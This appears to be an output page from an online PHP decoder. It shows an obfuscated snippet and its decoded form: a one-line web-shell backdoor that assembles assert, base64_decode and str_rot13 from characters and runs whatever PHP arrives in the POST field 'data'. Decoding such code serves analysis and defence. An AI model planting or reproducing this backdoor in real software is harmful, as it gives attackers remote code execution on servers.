Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $ohx=chr(97)."s".chr(115).chr(101)."\x72"."t"; $twu="b".chr(97)."\x73"."\x65"."6"...
Decoded Output download
<?php
$ohx=chr(97)."s".chr(115).chr(101)."r"."t";
$twu="b".chr(97)."s"."e"."6".chr(52)."_"."d".chr(101)."c"."o"."d"."e";$ye="s"."t"."r"."_"."r"."o"."t"."1".chr(51);@$ohx(@$twu(@$ye($_POST[chr(100)."a"."t"."a"])));
?>
Did this file decode correctly?
Original Code
<?php
$ohx=chr(97)."s".chr(115).chr(101)."\x72"."t";
$twu="b".chr(97)."\x73"."\x65"."6".chr(52)."\x5f"."d".chr(101)."c"."\x6f"."d"."\x65";$ye="s"."t"."\x72"."\x5f"."r"."\x6f"."t"."1".chr(51);@$ohx(@$twu(@$ye($_POST[chr(100)."a"."\x74"."\x61"])));
?>
Function Calls
| chr | 8 |
| str_rot13 | 1 |
Stats
| MD5 | c36f2f85670d44426a56ad229b9c7771 |
| Eval Count | 0 |
| Decode Time | 105 ms |